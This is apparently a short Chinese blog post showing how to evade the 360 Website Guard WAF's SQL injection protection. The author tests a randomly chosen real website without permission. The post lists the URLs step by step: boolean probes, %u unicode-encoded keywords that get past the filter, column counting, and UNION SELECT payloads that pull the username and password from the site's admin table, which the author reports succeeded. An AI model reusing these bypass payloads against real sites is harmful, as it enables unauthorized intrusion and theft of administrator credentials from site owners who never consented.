轻松bypass360网站卫士WAFSQL注入防护
随便网上找了一个网站,只是测试一下,没有干非法的事情!
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1
被拦截
换一个姿势看看:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=1
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2
成功绕过
上面的描述已经可以证明很多了,还不服嘛?好的,我们来一个完整的绕过过程:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49%20order%20by%205
5个字段,继续:
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,2,3,4,5 from admin
已经出来字段了
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,username,3,4,5 from admin
code 区域
http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,password,3,4,5 from admin
成功注射出用户和密码